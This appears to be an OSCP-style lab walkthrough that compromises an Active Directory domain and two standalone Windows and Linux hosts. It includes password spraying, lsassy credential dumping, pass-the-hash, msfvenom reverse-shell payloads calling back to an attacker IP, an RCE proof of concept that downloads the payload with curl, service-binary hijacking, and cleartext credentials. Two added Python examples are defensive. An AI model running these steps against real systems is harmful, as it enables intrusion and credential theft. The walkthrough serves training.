Information
About this lab
This lab guides learners through an Active Directory exploitation chain, beginning with credential discovery in a SQLite database on an exposed web server. By cracking the credentials, learners gain access to an internal system via WinRM, escalate privileges through binary analysis and pivoting, and extract the domain administrator hash to achieve full domain compromise.
Active Directory Set
192.168.135.153 - MS01
Eric.Wallows / EricLikesRunning800Nmap
PORT STATE SERVICE
22/tcp open ssh
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
5985/tcp open wsman
8000/tcp open http-alt
Information Gathering
Web scan with feroxbuster
┌──(kali🎃kali)-[~/oscp/ad/153]
└─$ feroxbuster -u http://192.168.135.153:8000 -s 200 -t 200
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.13.0
───────────────────────────┬──────────────────────
🎯 Target Url │ http://192.168.135.153:8000/
🚩 In-Scope Url │ 192.168.135.153
🚀 Threads │ 200
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
👌 Status Codes │ [200]
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.13.0
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
200 GET 359l 2112w 178556c http://192.168.135.153:8000/iisstart.png
200 GET 32l 54w 696c http://192.168.135.153:8000/
200 GET 7l 38w 16406c http://192.168.135.153:8000/partner/db
200 GET 7l 38w 16406c http://192.168.135.153:8000/partner/DB
200 GET 7l 38w 16406c http://192.168.135.153:8000/Partner/db
200 GET 1l 6w 37c http://192.168.135.153:8000/partner/CHANGELOG
200 GET 7l 38w 16406c http://192.168.135.153:8000/Partner/DB
200 GET 1l 6w 37c http://192.168.135.153:8000/Partner/CHANGELOG
200 GET 1l 6w 37c http://192.168.135.153:8000/partner/changelog
200 GET 1l 6w 37c http://192.168.135.153:8000/Partner/changelog
200 GET 7l 38w 16406c http://192.168.135.153:8000/Partner/Db
Download the db file
┌──(kali🎃kali)-[~/oscp/ad/153]
└─$ wget http://192.168.135.153:8000/partner/db
--2025-12-26 01:52:36-- http://192.168.135.153:8000/partner/db
Connecting to 192.168.135.153:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16384 (16K) [application/octet-stream]
Saving to: ‘db’
db 100%[=====================================================>] 16.00K --.-KB/s in 0.08s
2025-12-26 01:52:36 (194 KB/s) - ‘db’ saved [16384/16384]
Account information found in the db file
- ecorp,7007296521223107d3445ea0db5a04f9
- support,26231162520c611ccabfb18b5ae4dff2
- bcorp,e7966b31d1cad8a83f12ecec236c384c
- acorp,df5fb539ff32f7fde5f3c05d8c8c1a6e
┌──(kali🎃kali)-[~/oscp/ad/153]
└─$ cat db.json
id,name,password,desc
1,ecorp,7007296521223107d3445ea0db5a04f9,-
2,support,26231162520c611ccabfb18b5ae4dff2,support account for internal use
3,bcorp,e7966b31d1cad8a83f12ecec236c384c,-
4,acorp,df5fb539ff32f7fde5f3c05d8c8c1a6e,-
Initial Access
ssh
┌──(kali🎃kali)-[~/oscp/ad/153]
└─$ ssh Eric.Wallows@192.168.135.153
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
Eric.Wallows@192.168.135.153's password:
Microsoft Windows [Version 10.0.19044.2251]
(c) Microsoft Corporation. All rights reserved.
oscp\eric.wallows@MS01 C:\Users\eric.wallows>
Enumerated local users
*Evil-WinRM* PS C:\> net user
User accounts for \\
-------------------------------------------------------------------------------
Administrator DefaultAccount Guest
Mary.Williams support WDAGUtilityAccount
The command completed with one or more errors.
Privilege Escalation
admintool.exe found
oscp\eric.wallows@MS01 C:\Users\eric.wallows>dir
Volume in drive C has no label.
Volume Serial Number is 3C99-887F
Directory of C:\Users\eric.wallows
02/03/2025 01:14 PM <DIR> .
02/03/2025 01:14 PM <DIR> ..
11/21/2022 04:49 AM 6,102,702 admintool.exe
12/07/2019 01:14 AM <DIR> Desktop
12/25/2025 10:23 PM <DIR> Documents
12/07/2019 01:14 AM <DIR> Downloads
12/07/2019 01:14 AM <DIR> Favorites
12/07/2019 01:14 AM <DIR> Links
12/07/2019 01:14 AM <DIR> Music
12/07/2019 01:14 AM <DIR> Pictures
12/07/2019 01:14 AM <DIR> Saved Games
12/07/2019 01:14 AM <DIR> Videos
1 File(s) 6,102,702 bytes
11 Dir(s) 10,279,878,656 bytes free
Run admintool.exe
- administrator hash found
- 05f8ba9f047f799adbea95a16de2ef5d
oscp\eric.wallows@MS01 C:\Users\eric.wallows>admintool.exe whoami
Enter administrator password:
thread 'main' panicked at 'assertion failed: `(left == right)`
left: `"d41d8cd98f00b204e9800998ecf8427e"`,
right: `"05f8ba9f047f799adbea95a16de2ef5d"`: Wrong administrator password!', src/main.rs:78:5
note: run with `RUST_BACKTRACE=1` environment variable to display a backtrace
Hash cracking
- https://hashes.com/en/decrypt/hash
- December31
- Freedom1
- ecorp
- Raid123!
- bcorp123!
05f8ba9f047f799adbea95a16de2ef5d:December31
26231162520c611ccabfb18b5ae4dff2:Freedom1
7007296521223107d3445ea0db5a04f9:ecorp
df5fb539ff32f7fde5f3c05d8c8c1a6e:Raid123!
e7966b31d1cad8a83f12ecec236c384c:bcorp123!
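The admintool.exe panic above is worth a closer look: the binary hashes the entered password with MD5 and compares it against a hard-coded MD5 inside an assertion, so the failure message prints both sides. The left value, d41d8cd98f00b204e9800998ecf8427e, is the MD5 of the empty string (nothing was typed at the prompt), and the right value is the stored digest that hashes.com then reversed. The db file has the same weakness: unsalted, fast MD5 of short passwords. As an added example that is not part of this writeup, the Python below puts that check next to a salted, slow (PBKDF2-HMAC-SHA256), constant-time verification whose failure path reveals nothing about the stored digest. The hash constants are the two values from the panic; the passwords and user records are constructed for the demo.

```python
import hashlib
import hmac
import os

# Values quoted from the lab output above: the "left" side of admintool's
# failed assertion, and the "right" side it was compared against.
EMPTY_MD5 = "d41d8cd98f00b204e9800998ecf8427e"
STORED_ADMIN_MD5 = "05f8ba9f047f799adbea95a16de2ef5d"

# Work factor for PBKDF2-HMAC-SHA256 (demo setting; tune to your CPU budget).
ITERATIONS = 600_000


def md5_hex(text: str) -> str:
    return hashlib.md5(text.encode()).hexdigest()


def weak_check(entered: str, stored_md5: str) -> bool:
    """The pattern the lab binary and the db file rely on: unsalted MD5.

    MD5 is fast (cheap offline guessing), no salt means identical passwords
    hash identically and public lookup tables apply, and the error text
    reveals both digests, which is exactly how the writeup got the hash.
    """
    digest = md5_hex(entered)
    if digest != stored_md5:
        raise ValueError(f"Wrong administrator password! left={digest} right={stored_md5}")
    return True


def weak_check_message(entered: str, stored_md5: str) -> str:
    """What a caller sees on failure ('' on success)."""
    try:
        weak_check(entered, stored_md5)
        return ""
    except ValueError as exc:
        return str(exc)


def make_record(password: str) -> dict:
    """Store a per-user random salt and a slow PBKDF2 digest, never a bare fast hash."""
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return {"salt": salt.hex(), "iterations": ITERATIONS, "hash": dk.hex()}


def strong_check(entered: str, record: dict) -> bool:
    """Constant-time verification; the only thing a caller learns is True/False."""
    dk = hashlib.pbkdf2_hmac(
        "sha256", entered.encode(), bytes.fromhex(record["salt"]), record["iterations"]
    )
    return hmac.compare_digest(dk.hex(), record["hash"])


if __name__ == "__main__":
    # 1. An empty password reproduces the "left" value from the panic message.
    print("md5('') matches the leaked left value:", md5_hex("") == EMPTY_MD5)
    # 2. The weak check leaks the stored digest in its failure text.
    print(weak_check_message("", STORED_ADMIN_MD5))
    # 3. The hardened check with a constructed password: no digest in the failure path.
    rec = make_record("correct horse battery staple")
    print("right password:", strong_check("correct horse battery staple", rec))
    print("wrong password:", strong_check("", rec))
    # 4. Two users with the same password get different records (per-user salt).
    print("salted records differ:", make_record("same")["hash"] != make_record("same")["hash"])
```

Two defender takeaways from running it: an error path that includes the expected value turns a failed login into an offline cracking job, and any digest table where two users share a hash (as bcorp and acorp would if they shared a password) is unsalted and should be migrated to a slow, salted scheme on next login.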
SSH login as administrator succeeded
┌──(kali🎃kali)-[~/oscp/ad/153]
└─$ ssh administrator@192.168.135.153
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
administrator@192.168.135.153's password:
Microsoft Windows [Version 10.0.19044.2251]
(c) Microsoft Corporation. All rights reserved.
administrator@MS01 C:\Users\Administrator>
Post-Exploitation
Check the PowerShell history
- Found a string that appears to be a password
- hghgib6vHT3bVWf
PS C:\Users\Administrator\Documents> (Get-PSReadlineOption).HistorySavePath
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
PS C:\Users\Administrator\Documents> cd C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\
PS C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine> type *
C:\users\support\admintool.exe hghgib6vHT3bVWf cmd
C:\users\support\admintool.exe cmd
shutdown /r /t 7
cd Documents
dir
powershell -ep bypass
.\mimikatz.exe
clear
(Get-PSReadlineOption).HistorySavePath
cd C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\
type *
C:\users\support\admintool.exe hghgib6vHT3bVWf cmd
C:\users\support\admintool.exe cmd
Pivoting
kali
┌──(kali🎃kali)-[~/oscp/ad/153]
└─$ sudo ligolo-proxy -selfcert
[sudo] password for kali:
INFO[0000] Loading configuration file ligolo-ng.yaml
WARN[0000] daemon configuration file not found. Creating a new one...
? Enable Ligolo-ng WebUI? No
WARN[0001] Using default selfcert domain 'ligolo', beware of CTI, SOC and IoC!
ERRO[0001] Certificate cache error: acme/autocert: certificate cache miss, returning a new certificate
INFO[0001] Listening on 0.0.0.0:11601
__ _ __
/ / (_)___ _____ / /___ ____ ____ _
/ / / / __ `/ __ \/ / __ \______/ __ \/ __ `/
/ /___/ / /_/ / /_/ / / /_/ /_____/ / / / /_/ /
/_____/_/\__, /\____/_/\____/ /_/ /_/\__, /
/____/ /____/
Made in France ♥ by @Nicocha30!
Version: dev
ligolo-ng » INFO[0058] Agent joined. id=005056ab5af9 name="MS01\\Administrator@MS01" remote="192.168.135.153:52168"
ligolo-ng »
ligolo-ng » session
? Specify a session : 1 - MS01\Administrator@MS01 - 192.168.135.153:52168 - 005056ab5af9
[Agent : MS01\Administrator@MS01] » interface_create --name ligolo
INFO[0081] Creating a new ligolo interface...
INFO[0081] Interface created!
[Agent : MS01\Administrator@MS01] » start
INFO[0084] Starting tunnel to MS01\Administrator@MS01 (005056ab5af9)
[Agent : MS01\Administrator@MS01] » route_add --name ligolo --route 10.10.68.0/24
INFO[0101] Route created.
ms01
*Evil-WinRM* PS C:\Users\Administrator\Documents> .\agent.exe -connect 192.168.`111111`:11601 -ignore-cert
agent.exe : time="2025-12-25T23:38:58-08:00" level=warning msg="warning, certificate validation disabled"
+ CategoryInfo : NotSpecified: (time="2025-12-2...ation disabled":String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
time="2025-12-25T23:38:59-08:00" level=info msg="Connection established" addr="192.168.45.199:11601"
10.10.68.154 - MS02
Nmap
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1433/tcp open ms-sql-s
5985/tcp open wsman
Lateral Movement (MS01 to MS02)
nxc winrm
- administrator:hghgib6vHT3bVWf authenticated successfully
┌──(kali🎃kali)-[~/oscp/ad]
└─$ nxc winrm 10.10.68.154 -u users.txt -p password.txt -t 100 --continue-on-success --local-auth
WINRM 10.10.68.154 5985 MS02 [*] Windows 10 / Server 2019 Build 19041 (name:MS02) (domain:oscp.exam)
WINRM 10.10.68.154 5985 MS02 [-] MS02\administrator:EricLikesRunning800
WINRM 10.10.68.154 5985 MS02 [-] MS02\Eric.Wallows:EricLikesRunning800
WINRM 10.10.68.154 5985 MS02 [-] MS02\Mary.Williams:EricLikesRunning800
<SNIP>
WINRM 10.10.68.154 5985 MS02 [-] MS02\bcorp:bcorp123!
WINRM 10.10.68.154 5985 MS02 [-] MS02\acorp:bcorp123!
WINRM 10.10.68.154 5985 MS02 [+] MS02\administrator:hghgib6vHT3bVWf (Pwn3d!)
WINRM 10.10.68.154 5985 MS02 [-] MS02\Eric.Wallows:hghgib6vHT3bVWf
WINRM 10.10.68.154 5985 MS02 [-] MS02\Mary.Williams:hghgib6vHT3bVWf
WinRM login
┌──(kali🎃kali)-[~/oscp/ad]
└─$ evil-winrm -i 10.10.68.154 -u 'administrator' -p 'hghgib6vHT3bVWf'
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>
Post-Exploitation
nxc lsassy module
- administrator:hghgib6vHT3bVWf
┌──(kali🎃kali)-[~/oscp/ad/154]
└─$ nxc smb 10.10.68.154 -u 'administrator' -p 'hghgib6vHT3bVWf' --local-auth -M lsassy
SMB 10.10.68.154 445 MS02 [*] Windows 10 / Server 2019 Build 19041 x64 (name:MS02) (domain:MS02) (signing:False) (SMBv1:False)
SMB 10.10.68.154 445 MS02 [+] MS02\administrator:hghgib6vHT3bVWf (Pwn3d!)
LSASSY 10.10.68.154 445 MS02 OSCP\Administrator 59b280ba707d22e3ef0aa587fc29ffe5
10.10.68.152 - DC01
Nmap
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
Lateral Movement (MS02 to DC01)
WinRM authentication succeeded with the administrator NTLM hash obtained on MS02
┌──(kali🎃kali)-[~]
└─$ nxc winrm 10.10.68.152 -u 'administrator' -H '59b280ba707d22e3ef0aa587fc29ffe5'
WINRM 10.10.68.152 5985 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:oscp.exam)
WINRM 10.10.68.152 5985 DC01 [+] oscp.exam\administrator:59b280ba707d22e3ef0aa587fc29ffe5 (Pwn3d!)
WINRM 10.10.68.152 5985 DC01 [-] oscp.exam\administrator:59b280ba707d22e3ef0aa587fc29ffe5 zip() argumen
WinRM login
┌──(kali🎃kali)-[~]
└─$ evil-winrm -i 10.10.68.152 -u 'administrator' -H '59b280ba707d22e3ef0aa587fc29ffe5'
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>
Read proof.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type proof.txt
1cfa2fd5d9f96abf7da31c2a724927a4
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 10.10.68.152
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 10.10.68.254
Independent Challenge
192.168.135.155 - Pascha
Nmap
PORT STATE SERVICE
80/tcp open http
9099/tcp open unknown
9999/tcp open abyss
Initial Access
searchsploit abyss
┌──(kali🎃kali)-[~/oscp/155]
└─$ searchsploit abyss
-------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------------------------------- ---------------------------------
Abyss Web Server 1.0 - Encoded Backslash Directory Traversal | windows/remote/21735.txt
Abyss Web Server 1.0 - File Disclosure | windows/remote/21367.txt
Abyss Web Server 1.0/1.1 - Authentication Bypass | windows/remote/23419.txt
Abyss Web Server 1.1.2 - Incomplete HTTP Request Denial of Service | windows/dos/22460.txt
Abyss Web Server < 2.11.6 - Heap Memory Corruption | windows/dos/43207.txt
Abyss Web Server X1 - Cross-Site Request Forgery | windows/webapps/12640.txt
Abyss Web Server X1 2.11.1 - Unquoted Service Path Privilege Escalation | windows/local/40460.txt
Abyssal Metal Player 2.0.9 - Denial of Service | windows/dos/14713.py
-------------------------------------------------------------------------------------------- ---------------------------------
Searched for “9099/tcp open unknown vuln”
- Mobile Mouse 3.6.0.4 - Remote Code Execution (RCE)
- https://www.exploit-db.com/exploits/51010
Downloaded POC
┌──(kali🎃kali)-[~/oscp/155]
└─$ searchsploit -m 51010
Exploit: Mobile Mouse 3.6.0.4 - Remote Code Execution (RCE)
URL: https://www.exploit-db.com/exploits/51010
Path: /usr/share/exploitdb/exploits/windows/remote/51010.py
Codes: N/A
Verified: False
File Type: Python script, ASCII text executable
Copied to: /home/kali/oscp/155/51010.py
Create the reverse shell file
┌──(kali🎃kali)-[~/oscp/155]
└─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.199 LPORT=9099 -f exe -o met.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7680 bytes
Saved as: met.exe
Start an HTTP server on port 8080 to serve met.exe
┌──(kali🎃kali)-[~/oscp/155]
└─$ python -m http.server 8080
Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ...
Start an nc listener on port 9099
┌──(kali🎃kali)-[~/oscp/155]
└─$ rlwrap nc -nlvp 9099
listening on [any] 9099 ...
Run the PoC
┌──(kali🎃kali)-[~/oscp/155]
└─$ python 51010.py --target 192.168.135.155 --file met.exe --lhost 192.168.45.199
/home/kali/oscp/155/51010.py:41: SyntaxWarning: invalid escape sequence '\{'
download_string= f"curl http://{lhost}:8080/{command_shell} -o c:\Windows\Temp\{command_shell}".encode('utf-8')
/home/kali/oscp/155/51010.py:41: SyntaxWarning: invalid escape sequence '\W'
download_string= f"curl http://{lhost}:8080/{command_shell} -o c:\Windows\Temp\{command_shell}".encode('utf-8')
/home/kali/oscp/155/51010.py:54: SyntaxWarning: invalid escape sequence '\{'
shell_string= f"c:\Windows\Temp\{command_shell}".encode('utf-8')
/home/kali/oscp/155/51010.py:54: SyntaxWarning: invalid escape sequence '\W'
shell_string= f"c:\Windows\Temp\{command_shell}".encode('utf-8')
Executing The Command Shell...
Take The Rose
nc reverse shell connection established
┌──(kali🎃kali)-[~/oscp/155]
└─$ rlwrap nc -nlvp 9099
listening on [any] 9099 ...
connect to [192.168.45.199] from (UNKNOWN) [192.168.135.155] 53346
Microsoft Windows [Version 10.0.19045.2251]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\Temp>
Read local.txt
PS C:\Users\tim\Desktop> type local.txt
type local.txt
7bcaf20a94dc192a17c0ea06bdd45366
PS C:\Users\tim\Desktop> ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . :
Link-local IPv6 Address . . . . . : fe80::fdb5:ada4:541a:7a21
IPv4 Address. . . . . . . . . . . : 192.168.135.155
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.135.254
Privilege Escalation
powerup
- The file “C:\Program Files\MilleGPG5\GPGService.exe” used by the GPGOrchestrator service is modifiable
ServiceName : GPGOrchestrator
Path : "C:\Program Files\MilleGPG5\GPGService.exe"
ModifiableFile : C:\Program Files\MilleGPG5\GPGService.exe
ModifiableFilePermissions : {Delete, WriteAttributes, Synchronize, ReadControl...}
ModifiableFileIdentityReference : BUILTIN\Users
StartName : LocalSystem
AbuseFunction : Install-ServiceBinary -Name 'GPGOrchestrator'
CanRestart : True
Name : GPGOrchestrator
Check : Modifiable Service Files
Create payload.exe, which opens a reverse shell to port 9999
┌──(kali🎃kali)-[~/oscp/155]
└─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.199 LPORT=9999 -f exe -o payload.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7680 bytes
Saved as: payload.exe
Stop the GPGOrchestrator service, then replace GPGService.exe with payload.exe
PS C:\Users\Tim\Desktop> sc.exe stop GPGOrchestrator
sc.exe stop GPGOrchestrator
SERVICE_NAME: GPGOrchestrator
TYPE : 10 WIN32_OWN_PROCESS
STATE : 4 RUNNING
(STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
PS C:\Users\Tim\Desktop> cp payload.exe "C:\Program Files\MilleGPG5\GPGService.exe"
cp payload.exe "C:\Program Files\MilleGPG5\GPGService.exe"
Start the GPGOrchestrator service
PS C:\Users\Tim\Desktop> sc.exe start GPGOrchestrator
sc.exe start GPGOrchestrator
[SC] StartService FAILED 1053:
The service did not respond to the start or control request in a timely fashion.
nc connection on port 9999 established
┌──(kali🎃kali)-[~/oscp/155]
└─$ rlwrap nc -nlvp 9999
listening on [any] 9999 ...
connect to [192.168.45.199] from (UNKNOWN) [192.168.135.155] 55262
Microsoft Windows [Version 10.0.19045.2251]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32>
Read proof.txt
PS C:\Users\Administrator\Desktop> dir
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 12/26/2025 6:59 AM 34 proof.txt
PS C:\Users\Administrator\Desktop> type proof.txt
f467f9374a3d455ce6a49eb39ac0328a
PS C:\Users\Administrator\Desktop> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . :
Link-local IPv6 Address . . . . . : fe80::2349:460f:c907:a12c%4
IPv4 Address. . . . . . . . . . . : 192.168.135.155
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.135.254
192.168.135.156 - Frankfurt
Nmap
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
25/tcp open smtp
53/tcp open domain
80/tcp open http
110/tcp open pop3
143/tcp open imap
465/tcp open smtps
587/tcp open submission
993/tcp open imaps
995/tcp open pop3s
2525/tcp open ms-v-worlds
3306/tcp open mysql
8080/tcp open http-proxy
8083/tcp open us-srv
8443/tcp open https-alt
53/udp open domain
161/udp open snmp
Initial Access & Privilege Escalation
Check the SNMP community string
- public
┌──(kali🎃kali)-[~/oscp/156]
└─$ hydra -P /usr/share/wordlists/seclists/Discovery/SNMP/common-snmp-community-strings.txt snmp://192.168.135.156
Hydra v9.6 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-12-26 10:54:27
[DATA] max 16 tasks per 1 server, overall 16 tasks, 118 login tries (l:1/p:118), ~8 tries per task
[DATA] attacking snmp://192.168.135.156:161/
[161][snmp] host: 192.168.135.156 password: public
[STATUS] attack finished for 192.168.135.156 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-12-26 10:54:28
snmpwalk
- Found that the jack account's password was reset
- jack:3PUKsX98BMupBiCf
┌──(kali🎃kali)-[~/oscp/156]
└─$ snmpwalk -v2c -c public 192.168.135.156 NET-SNMP-EXTEND-MIB::nsExtendObjects
NET-SNMP-EXTEND-MIB::nsExtendNumEntries.0 = INTEGER: 2
NET-SNMP-EXTEND-MIB::nsExtendCommand."reset-password" = STRING: /bin/sh
NET-SNMP-EXTEND-MIB::nsExtendCommand."reset-password-cmd" = STRING: /bin/echo
NET-SNMP-EXTEND-MIB::nsExtendArgs."reset-password" = STRING: -c "echo \"jack:3PUKsX98BMupBiCf\" | chpasswd"
NET-SNMP-EXTEND-MIB::nsExtendArgs."reset-password-cmd" = STRING: "\"jack:3PUKsX98BMupBiCf\" | chpasswd"
NET-SNMP-EXTEND-MIB::nsExtendInput."reset-password" = STRING:
NET-SNMP-EXTEND-MIB::nsExtendInput."reset-password-cmd" = STRING:
NET-SNMP-EXTEND-MIB::nsExtendCacheTime."reset-password" = INTEGER: 5
NET-SNMP-EXTEND-MIB::nsExtendCacheTime."reset-password-cmd" = INTEGER: 5
NET-SNMP-EXTEND-MIB::nsExtendExecType."reset-password" = INTEGER: shell(2)
NET-SNMP-EXTEND-MIB::nsExtendExecType."reset-password-cmd" = INTEGER: shell(2)
NET-SNMP-EXTEND-MIB::nsExtendRunType."reset-password" = INTEGER: run-on-read(1)
NET-SNMP-EXTEND-MIB::nsExtendRunType."reset-password-cmd" = INTEGER: run-on-read(1)
NET-SNMP-EXTEND-MIB::nsExtendStorage."reset-password" = INTEGER: permanent(4)
NET-SNMP-EXTEND-MIB::nsExtendStorage."reset-password-cmd" = INTEGER: permanent(4)
NET-SNMP-EXTEND-MIB::nsExtendStatus."reset-password" = INTEGER: active(1)
NET-SNMP-EXTEND-MIB::nsExtendStatus."reset-password-cmd" = INTEGER: active(1)
NET-SNMP-EXTEND-MIB::nsExtendOutput1Line."reset-password" = STRING: Changing password for jack.
NET-SNMP-EXTEND-MIB::nsExtendOutput1Line."reset-password-cmd" = STRING: "jack:3PUKsX98BMupBiCf" | chpasswd
NET-SNMP-EXTEND-MIB::nsExtendOutputFull."reset-password" = STRING: Changing password for jack.
NET-SNMP-EXTEND-MIB::nsExtendOutputFull."reset-password-cmd" = STRING: "jack:3PUKsX98BMupBiCf" | chpasswd
NET-SNMP-EXTEND-MIB::nsExtendOutNumLines."reset-password" = INTEGER: 1
NET-SNMP-EXTEND-MIB::nsExtendOutNumLines."reset-password-cmd" = INTEGER: 1
NET-SNMP-EXTEND-MIB::nsExtendResult."reset-password" = INTEGER: 256
NET-SNMP-EXTEND-MIB::nsExtendResult."reset-password-cmd" = INTEGER: 0
NET-SNMP-EXTEND-MIB::nsExtendOutLine."reset-password".1 = STRING: Changing password for jack.
NET-SNMP-EXTEND-MIB::nsExtendOutLine."reset-password-cmd".1 = STRING: "jack:3PUKsX98BMupBiCf" | chpasswd
Web access on port 8083
- Vesta service login page present
- Logged in successfully as jack:3PUKsX98BMupBiCf
Vesta service RCE vulnerability found
Ran the PoC with the jack credentials from the earlier successful login
- Obtained root privileges
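The snmpwalk output above is a configuration leak rather than a software bug: two nsExtend entries run a shell command on every SNMP read, and the command line, password included, is readable by anyone holding the default community string. As an added example that is not part of this writeup, the Python below parses snmpwalk output of that shape and flags extend entries that embed credential material or run a shell on read, the two conditions that made the Frankfurt box fall. The sample walk is constructed for the demo (entry names, commands and the password string are made up), so it runs offline.

```python
import re

# Constructed sample in the shape of the snmpwalk output above; the entry
# names, commands and the "svc" password are made up for the demo.
SAMPLE_WALK = """\
NET-SNMP-EXTEND-MIB::nsExtendNumEntries.0 = INTEGER: 2
NET-SNMP-EXTEND-MIB::nsExtendCommand."reset-password" = STRING: /bin/sh
NET-SNMP-EXTEND-MIB::nsExtendCommand."uptime" = STRING: /usr/bin/uptime
NET-SNMP-EXTEND-MIB::nsExtendArgs."reset-password" = STRING: -c "echo \\"svc:ExamplePass123\\" | chpasswd"
NET-SNMP-EXTEND-MIB::nsExtendArgs."uptime" = STRING:
NET-SNMP-EXTEND-MIB::nsExtendExecType."reset-password" = INTEGER: shell(2)
NET-SNMP-EXTEND-MIB::nsExtendExecType."uptime" = INTEGER: exec(1)
NET-SNMP-EXTEND-MIB::nsExtendRunType."reset-password" = INTEGER: run-on-read(1)
NET-SNMP-EXTEND-MIB::nsExtendRunType."uptime" = INTEGER: run-on-read(1)
NET-SNMP-EXTEND-MIB::nsExtendOutLine."reset-password".1 = STRING: Changing password for svc.
"""

# One walk line: field name, quoted entry name, optional sub-index, typed value.
LINE_RE = re.compile(
    r'^NET-SNMP-EXTEND-MIB::nsExtend(?P<field>\w+)\."(?P<name>[^"]+)"(?:\.\d+)?'
    r' = (?:STRING|INTEGER):\s?(?P<value>.*)$'
)

# Heuristic for secrets in an extend command line: password tooling, or a
# user:secret pair with a secret of at least six non-delimiter characters.
CRED_RE = re.compile(r'chpasswd|passwd|password=|\b[\w.-]+:[^\s"\\|]{6,}')


def parse_walk(text):
    """Group the walk into {entry name: {field: value}}; unrelated lines are skipped."""
    entries = {}
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            entries.setdefault(m["name"], {})[m["field"]] = m["value"].strip()
    return entries


def audit_extend(entries):
    """Findings for extend entries a defender should remove or lock down."""
    findings = []
    for name, e in entries.items():
        cmdline = f'{e.get("Command", "")} {e.get("Args", "")}'.strip()
        if CRED_RE.search(e.get("Args", "")):
            findings.append({"entry": name, "cmd": cmdline,
                             "reason": "credential material in extend arguments"})
        if e.get("ExecType", "").startswith("shell") and e.get("RunType", "").startswith("run-on-read"):
            findings.append({"entry": name, "cmd": cmdline,
                             "reason": "shell command executed on every SNMP read"})
    return findings


if __name__ == "__main__":
    for f in audit_extend(parse_walk(SAMPLE_WALK)):
        print(f"[{f['entry']}] {f['reason']}: {f['cmd']}")
```

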